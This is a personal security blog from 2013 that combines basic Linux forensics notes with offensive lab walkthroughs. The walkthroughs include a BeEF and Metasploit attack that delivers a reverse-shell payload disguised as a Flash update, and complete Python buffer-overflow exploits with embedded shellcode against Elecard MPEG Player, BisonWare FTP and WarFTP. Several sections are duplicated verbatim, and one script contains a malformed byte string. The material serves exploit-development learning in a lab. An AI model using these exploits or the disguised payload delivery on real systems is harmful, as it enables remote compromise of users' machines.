Friday, 24 May 2013
Linux commands for computer forensics
Here are some of linux basic command that used in computer forensics :
1. dd - command used to copy from an input file or device to an output file or device.
syntax : dd if=[source] of=[destination] bs=(optional)
2. hdparm - command to get evidence harddisk information.
syntax : hdparm [ flags ] [device]
3. sfdisk and fdisk - command to determine the disk structure.
syntax :
sfdisk [options] device
sfdisk -s [partition]
4. md5sum and sha1sum - create and store an MD5 or SHA hash of file or list of files (including devices). syntax :
md5sum [OPTION] [FILE]...
md5sum [OPTION] --check [FILE]
sha1sum [OPTION] [FILE]...
sha1sum [OPTION] --check [FILE]
5. mount - mount a file system.
syntax :
mount [-lhV]
mount -a [-fFnrsvw] [-t vfstype] [-O optlist]
mount [-fnrsvw] [-o options [,...]] device | dir
mount [-fnrsvw] [-t vfstype] [-o options] device dir
6. etc..
1. dd - command used to copy from an input file or device to an output file or device.
syntax : dd if=[source] of=[destination] bs=(optional)
2. hdparm - command to get evidence harddisk information.
syntax : hdparm [ flags ] [device]
3. sfdisk and fdisk - command to determine the disk structure.
syntax :
sfdisk [options] device
sfdisk -s [partition]
4. md5sum and sha1sum - create and store an MD5 or SHA hash of file or list of files (including devices). syntax :
md5sum [OPTION] [FILE]...
md5sum [OPTION] --check [FILE]
sha1sum [OPTION] [FILE]...
sha1sum [OPTION] --check [FILE]
5. mount - mount a file system.
syntax :
mount [-lhV]
mount -a [-fFnrsvw] [-t vfstype] [-O optlist]
mount [-fnrsvw] [-o options [,...]] device | dir
mount [-fnrsvw] [-t vfstype] [-o options] device dir
6. etc..
Thursday, 23 May 2013
Computer Forensic : unallocated space and slack space
Unalocated
space : Unallocated space, sometimes called “free space”, is logical space on a
hard drive that the operating system, e.g Windows, can write to. To put it
another way it is the opposite of “allocated” space, which is where the
operating system has already written files to. Unallocated space can contain deleted
files or partially deleted files. When a
file is deleted, the pointers to the file are removed, but the data remains in
unallocated space until such time as the operating system stores another file
in the same space, thereby over-writing the data.
Slack
space : Slack space refers to portions of a hard drive that are not fully used
by the current allocated file and which may contain data from a previously
deleted file. Slack space or sometimes referred to as file slack is the area
between the end of a fileand end of the last cluster or sector used by the file
in question. Slackspace is common in file systems that use a large cluster
size, while the file system that uses a small cluster size can organize the
storage media more effectively and efficiently. A cluster is the smallest unit
of storage that the operating system can deal with. When a file is written, and
does not occupy the entire cluster, the remaining space is slack space.
Computer Forensic : Introduction
Hello again, today my blog post is about Computer Forensic, one of my favourite subject in computer security world. What is Computer Forensic? Computer forensics is the application of
investigation and analysis techniques to gather and preserve evidence from a
particular computing device in a way that is suitable for presentation in a
court of law. The goal of computer forensics is to perform a structured
investigation while maintaining a documented chain of evidence to find out
exactly what happened on a computing device and who was responsible for it.
Computer forensics involves the preservation, identification, extraction,
interpretation, and documentation of computer evidence.
So, what is the differences between Computer Forensic and Digital Forensic? Digital forensics (sometimes known as digital forensic science) is a branch of forensic science encompassing the recovery and investigation of material found in digital devices, often in relation to computer crime. The term digital forensics was originally used as a synonym for computer forensics but has expanded to cover investigation of all devices capable of storing digital data.
There are 4 phases of Digital Forensic :
1. Identification (Crime scene) --> identify all of the digital evidences
2. Collecting (Lab)
a. Chain of custody --> collecting, labeling and documenting all of the digital evidences
b. Acquisition --> make clones of digital evidences
c. Fingerprint --> create hash file
3. Analysis (Lab)
a. Chain of Custody --> change permisssion of digital evidence to read-only
b. Analysis --> perform analysis from the clone of digital evidences
c. Collecting --> summarize the results found
d. Reconstruction --> construct the case into timeframe
4. Presentation (Court / Law)
There are 2 conditions when performing forensic activity :
1. Live : when the digital evidences still alive/turn on. In this case the investigator can also clone the RAM
2. Dead : when the digital evidences have been torned off.
So, what is the differences between Computer Forensic and Digital Forensic? Digital forensics (sometimes known as digital forensic science) is a branch of forensic science encompassing the recovery and investigation of material found in digital devices, often in relation to computer crime. The term digital forensics was originally used as a synonym for computer forensics but has expanded to cover investigation of all devices capable of storing digital data.
There are 4 phases of Digital Forensic :
1. Identification (Crime scene) --> identify all of the digital evidences
2. Collecting (Lab)
a. Chain of custody --> collecting, labeling and documenting all of the digital evidences
b. Acquisition --> make clones of digital evidences
c. Fingerprint --> create hash file
3. Analysis (Lab)
a. Chain of Custody --> change permisssion of digital evidence to read-only
b. Analysis --> perform analysis from the clone of digital evidences
c. Collecting --> summarize the results found
d. Reconstruction --> construct the case into timeframe
4. Presentation (Court / Law)
There are 2 conditions when performing forensic activity :
1. Live : when the digital evidences still alive/turn on. In this case the investigator can also clone the RAM
2. Dead : when the digital evidences have been torned off.
Monday, 20 May 2013
From web application to ID 0
How to gaining access to local system from web application? in this post i will simulate the process of gaining access using DVWA installed on Metasploitable OS as a target. i will use the one of several vulnerabilities of DVWA to penetrate the system, put the backdoor shell command, gaining root access, and doing some post exploitation activities.
--on progress--
--on progress--
Sunday, 19 May 2013
Client side attack combination using BeEF and Metasploit
Hello again, in this post i will simulate the client side attack using Beef and metasploit. client side attack is the attack performed by the client. in this simulation i am using windows xp in virtualbox and firefox browser as a target.
Here's the gameplay :
1. attacker send the link of youtube website to the target that contain file hook.js from BeEF
2. when the target open the link, BeEf will hook the target.
3. attacker will send the fake javascript update .exe that contain payload from metasploit
3. target click the update and the system will be pwned.
And here's the steps :
- choose a video on youtube and save page as youtube.html and put in /var/www/
- run the BeEF from menu backtrack > exploitation > social engineering tools > BeEF
- modify the youtube.html and insert the hook.js
- run the infected html file in target's browser
- open BeEF panel in backtrack's browser, the address is 192.168.56.1:3000/ui/panel
- the target's browser is successfully hooked by BeEF
- create the fake exe file update using metasploit
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=1234 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /var/www/flashupdate.exe
- run metasploit (msfconsole) and listening on port 1234
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.1
set LPORT 1234
exploit
- send the payload file with redirect browser command in BeEF
- execute the file
- Voila! the system is pwned!
Wednesday, 24 April 2013
Buffer Overflow : SEH based exploit on Elecard MPEG Player
in this post i will write my steps to exploit media player application (Elecard MPEG Player) with SEH protection, and here's the steps :
1. install application in windows XP machine
2. do the information gathering about supported filetype
3. From IG i got the information : the target support .m3u file and need a header
4. create the fuzzer file with python
file="seh.m3u"
junk="#EXTM3U\n"
junk+="\x41"*15000
file=open(file,"w")
file.write(junk)
print "file created successfully..."
file.close()
5. compile fuzzer to generate the m3u file
6. run target and load the m3u fuzzer
7. the target is crashed
8. now open the target with ollyDbg to to see what actually happened
9. run target and load the m3u fuzzer
10. the target is crashed. look at the top left box, the EBP and ESI is overwritten, but the EIP is not. it's because the SEH handle the crash
11. to see the SEH go to view > SEH chain. press shift+F9 to bypass the fuzzer to EIP
12. next step is create pattern with metasploit and insert into fuzzer script
13. run target from ollyDbg and load the m3u fuzzer
14. look the address in SEH chain and find the offset using metasploit
15. the offset is 8, that means need 8 byte to go to SEH
16. change the fuzzer script to measure the exact address of SEH
file="music.m3u"
junk="#EXTM3U\n"
junk+="\x90"*8
junk+="\xEF\xBE\xAD\xDE"
junk+="\x90"*(15000-len(junk))
file=open(file,"w")
file.write(junk)
print "file created successfully..."
file.close()
17. okay, the SEH address is pwned.
18. next step is find the module that has POP POP RETN command but doesn't have SafeSEH protection
19. i will try to use esrcnet.dll module
20. now search sequence command of POP POP RETN in D3DIM7300 module
21. modify the fuzzer script
file="music.m3u"
junk="#EXTM3U\n"
junk+="\x90"*4
junk+="\xeb\x06\x90\x90" #jump short
junk+="\xA6\xA0\x94\x73" #POP ESI address
junk+="\x90"*(15000-len(junk))
file=open(file,"w")
file.write(junk)
print "file created successfully..."
file.close()
21. generate the payload with msfweb, in this case i use command call calculator
22. insert the payload into the fuzzer script and compile it
file="music.m3u"
junk="#EXTM3U\n"
junk+="\x90"*4
junk+="\xeb\x06\x90\x90" #jump short
junk+="\xA6\xA0\x94\x73"
junk+="\x90"*16
junk+=("\xbb\x10\xbf\xd7\x63\x29\xc9\xda\xc4\xd9\x74\x24\xf4\x5a\xb1\x23"
"\x31\x5a\x10\x83\xc2\x04\x03\x4a\xb3\x35\x96\x96\x23\xfd\x59\x66"
"\xb4\x75\x1c\x5a\x3f\xf5\x9a\xda\x3e\xe9\x2e\x55\x59\x7e\x6f\x49"
"\x58\x6b\xd9\x02\x6e\xe0\xdb\xfa\xbe\x36\x42\xae\x45\x76\x01\xa9"
"\x84\xbd\xe7\xb4\xc4\xa9\x0c\x8d\x9c\x09\xe9\x84\xf9\xd9\xae\x42"
"\x03\x35\x36\x01\x0f\x82\x3c\x4a\x0c\x15\xa8\xff\x30\x9e\x2f\x14"
"\xc1\xfc\x0b\xee\x11\xcd\x93\x8a\x1e\x6e\x24\xd7\xe1\x17\x48\x5c"
"\xa1\xeb\xdb\x12\x3e\x59\x50\xba\x36\x4a\x6e\xb1\xc7\x3c\x71\xc5"
"\xc7\xb7\x1a\xf9\x98\xf6\x2c\x61\x71\x70\x28\xe2\xbd\xf9\x99\x8c"
"\x43\x26\xfb\x3f\xd4\x4e\x02\x35\x2a\x38\x04\xae\x50\xa7\x96\x53"
"\x97")
junk+="\x90"*(15000-len(junk))
file=open(file,"w")
file.write(junk)
print "file created successfully..."
file.close()
23. run the target without ollyDbg and insert the m3u fuzzer and see what happened
24. voila! the target is pwned!
Tuesday, 23 April 2013
Introducing SEH
SEH (Structured Exception Handling) is the protection integrated on a system of a software to handle the abnormal flow of the program that can caused the program to act abnormal too (crash, hang, etc). SEH will prevent the EIP to be overwritten directly by the excess data sent by the fuzzer. SEH will fully control the memory used by the software. This protection definitely forcing hackers to develop a technique to bypass the SEH protection. When this protection can be controlled, the execution process on the CPU also can be controlled easily like in the Direct Return Exploitation.
The most popular technique to bypass this protection is using the POP, POP, RETN technique. Basically stack in the memory is a structured memory consist of 32 bit virtual file. The first POP command will take out the topmost value layer of the virtual file to the other register on the memory. And the second POP command will take out the second layer of the stack on the memory. Finally the third command, RETN will be the first layer on the stack, so the system will start the execution process from that location depend on the memory address pointed by the RETN command.
When the technique above is done smoothly, the control of the process in the CPU is in our hand and can be manipulated as we wish. The problem now is, Windows have one more protection to prevent the SEH to be manipulated by the POP, POP, RETN technique called "SafeSEH".
In windows XP SP2 and Windows Server 2003, there is a new technology to protect the SEH to be bypassed called SafeSEH. Generally, SafeSEH is only a linker that can be used at the compilation process of a program/software in Windows system. When the SafeSEH is used, the application will generate a table that contain all memory address that will be used by itself and also save the addresses of the SEH on the modules used. This means, when an exploitation that utilize the POP POP RETN command happen, the address that used to bring the SEH to the POP POP RETN address wont work because the address is not recorded in the table generated by the SafeSEH and the exploitation will failed.
In addition to the SafeSEH protection, windows xp also have another protection against the exploitation that can be integrated into its dll files. This feature called "IMAGE_DLLCHARACTERISTICS_NO_SEH". If a dll file use that feature, it will prevent the use of any address inside itself to be used as the command to bypass the SEH.
There are some technique to bypass that protection :
1. Using modules or files that don't have SafeSEH and IMAGE_DLLCHARACTERISTICS_NO_SEH features integrated. Usually third party application library doesn't compilated with that two disturbing features.
2. Use the library that will be used to overwrite SEH from outside the application that have POP POP RETN command inside.
3. Use memory address outside HEAP memory.
4. Use an integrated handler memory that already registered.
There are some technique to bypass that protection :
1. Using modules or files that don't have SafeSEH and IMAGE_DLLCHARACTERISTICS_NO_SEH features integrated. Usually third party application library doesn't compilated with that two disturbing features.
2. Use the library that will be used to overwrite SEH from outside the application that have POP POP RETN command inside.
3. Use memory address outside HEAP memory.
4. Use an integrated handler memory that already registered.
Reference : http://scx010c075.blogspot.com/2012/02/more-about-seh-and-safeseh.html#ixzz2RMO4MdQj
Friday, 19 April 2013
Buffer overflow : direct return exploit BisonWare FTP Server V3.5
1. open application bisonWare FTP
2. test connection with nc
3. create fuzzer script with python
import socket
import sys
import time
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "\x41"*100
buffer+= "\r\n"
s.connect(('192.168.56.101',21))
print "Connecting...."
data = s.recv(1024)
time.sleep(3)
print "Sending Payload..."
data = s.recv(2000)
s.send('USER anonymous\r\n')
data = s.recv(2000)
s.send('PASS anonymous\r\n')
data = s.recv(2000)
s.send('ABOR ' + buffer +'\r\n')
s.close()
print "Finished..."
4. test sending fuzzer, start with *100, *200, *300, until target crash
5. target crash in *1600
6. open target from OllyDbg to begin debugging
7. try sending fuzzer again
8. look the EIP, it contains character 41414141 from fuzzer
9. create pattern and insert into fuzzer script
10. open target with OllyDbg and send fuzzer again
11. copy EIP register and find offset with pattern_offset.rb
12. edit the script to determine EIP location
buffer+="BBBB"
13. open target with OllyDbg and send fuzzer again
14. now EIP is under control
different from previous target, in this target i'm not using ESP register to put payload, i will use EBX. why? because the EBX is overflowed with fuzzer data while ESP is not. right click the ESP > follow in dump. there are big enough space to put payload.
15. find JUMP ESP command and copy the address into fuzzer script
buffer+="\x0B\xFD\xA6\x7C"
16. add breakpoint to the address of JMP EBX
17. open target with OllyDbg and send fuzzer again
18. EIP address is successfully overwritten by JMP EBX address
19. now generate the payload with msfweb, choose windows execute command > calc
20. copy payload script to the fuzzer script
import socket
import sys
import time
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
payload=("\xda\xdf\x33\xc9\xbf\xa0\xf7\x50\x16\xb1\x23\xd9\x74\x24\xf4\x5b"
"\x31\x7b\x17\x03\x7b\x17\x83\x63\xf3\xb2\xe3\x9f\x14\x76\x0c\x5f"
"\xe5\xfc\x49\x63\x6e\x7e\x57\xe3\x71\x90\xdc\x5c\x6a\xe5\xbc\x42"
"\x8b\x12\x0b\x09\xbf\x6f\x8d\xe3\xf1\xaf\x17\x57\x75\xef\x5c\xa0"
"\xb7\x3a\x91\xaf\xf5\x50\x5e\x94\xad\x82\x9b\x9f\xa8\x40\xfc\x7b"
"\x32\xbc\x65\x08\x38\x09\xe1\x51\x5d\x8c\x1e\xe6\x41\x05\xe1\x13"
"\xf0\x45\xc6\xe7\xc0\x47\xc6\x83\x4d\xe7\xf6\xce\x92\x90\xfa\x5b"
"\x52\x6d\x88\x2b\x4f\xc0\x05\xa3\x67\xf1\x13\xb8\xf8\xb5\x24\xbe"
"\xf8\x3e\x4c\x82\xa7\x71\x7b\x9a\x01\xfb\x7b\xd9\x6e\x80\x2b\xb5"
"\x10\xaf\x2e\x36\x85\xd7\x51\x32\x5b\xbf\x52\xa5\x07\x5e\xc1\x4a"
"\xc8")
buffer = "\x41"*1191 + "\x0B\xFD\xA6\x7C" + "\x90"*90 + payload+'\r\n'
print "Connecting...."
s.connect(('192.168.56.101',21))
data = s.recv(1024)
time.sleep(3)
print "Sending Payload..."
data = s.recv(2000)
s.send('USER anonymous\r\n')
data = s.recv(2000)
s.send('PASS anonymous\r\n')
data = s.recv(2000)
s.send('ABOR ' + buffer +'\r\n')
s.close()
print "Finished..."
21. open target without OllyDbg and send fuzzer again
22. Voila! the target has been exploited!
Tuesday, 16 April 2013
Buffer overflow : find bad characters
Bad character is the characters that will make a payload failed to run because in register they change into a random character (usually become byte 20)
now I will try to find bad characters
in WarFTP application
1 run OllyDbg and attach WarFTP
application
2 generate a byte characters with
generatecode.pl script
3 create a fuzzer script with python
import
socket
s
= socket.socket (socket.AF_INET, socket.SOCK_STREAM)
buffer
= "\x90"*485
buffer+=
"\xEF\xBE\xAD\xDE"
buffer+=
"\x90" * (493-len(buffer))
buffer+=
#insert generated characters here
buffer+=
"\xCC" * (1000-len(buffer))
s
. connect (('192.168.56.101',21))
data
= s.recv(1024)
print
("Sending evil data via USER command...")
s.send('USER
'+buffer+'\r\n')
data
= s.recv(1024)
s.send('PASS
'+'\r\n')
s.close()
print("Finish")
4 insert byte characters line per line to
the script (without bad characters). Default bad character is \x00
5 right click ESP > follow in dump
6 look for an abnormal character
(appear as byte 20)
7 delete the abnormal character from
the fuzzer script
8 go back to step 4 and do it until
there's no more bad characters are found
- found anomaly in \x0a
- found anomaly in \x0d
- found anomaly in \x40 (target is not
crash)
so far the bad characters found : \x00
\x0a \x0d \x40
9 insert all characters to fuzzer
script excluding the bad character found, here's the result :
10 there's no more bad character
Monday, 15 April 2013
Buffer overflow : direct return exploit warFTP application
Open and start warFTP application
test connection to warFTP
nc
192.168.56.101 21
Create fuzzer script with python :
import socket
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
buffer = "\x41"*1000
s . connect (('192.168.56.101',21))
data = s.recv(1024)
print ("Sendingevildatavia USER command...")
s.send('USER '+buffer+'\r\n')
data = s.recv(1024)
s.send('PASS '+'\r\n')
s.close()
print("Finish")
send fuzzer to target and see the target crash or not.
Python fuzzftp.py
the target is crash, it means that the target is vulnerable with buffer overflow
open warftp from OllyDbg to start debugging. send the fuzzer again and see what happened.
EIP is overwritten with character A. now replace the A character in fuzzer code with pattern from metasploit pattern_create
open and start again warftp from OllyDbg and send fuzzer again. See what happened.
EIP is overwritten by the pattern created before.
Find pattern offset EIP and ESP with metasploit pattern_offset
./pattern_offset.rb 32714131
The result for EIP is 485.
./pattern_offset.rb q4Aq5Aq
The result for ESP is 493
edit the script and insert EIP and ESP information
import socket
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
buffer = "\x90"*485
buffer += "\xLE\xHO\xRM\xWO"
buffer += "\x90"*(493-len(buffer))
buffer += "\xCC"*(1000-len(buffer))
s . connect (('192.168.56.101',21))
data = s.recv(1024)
print ("Sendingevildatavia USER command...")
s.send('USER '+buffer+'\r\n')
data = s.recv(1024)
s.send('PASS '+'\r\n')
s.close()
print("Finish")
send fuzzer into the target. See the result. Now the EIP and ESP is under controlled.
Next find the JMP ESP command from shell32.dll module with OllyDbg.
Copy the location and insert into the fuzzer script
import socket
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
buffer = "\x90"*485
buffer += "\x65\x82\xA5\x7C"
buffer += "\xCC"*(493-len(buffer))
buffer += "\xCC"*(1000-len(buffer))
s . connect (('192.168.56.101',21))
data = s.recv(1024)
print ("Sendingevildatavia USER command...")
s.send('USER '+buffer+'\r\n')
data = s.recv(1024)
s.send('PASS '+'\r\n')
s.close()
print("Finish")
test the new fuzzer and look the value of EIP
generate the payload from metasploit msfweb and insert into fuzzer script. In this case I will use Bind Shell
send the fuzzer again and try to telnet target. test with telnet to the target, if successful the terminal should be like this :
Subscribe to:
Posts (Atom)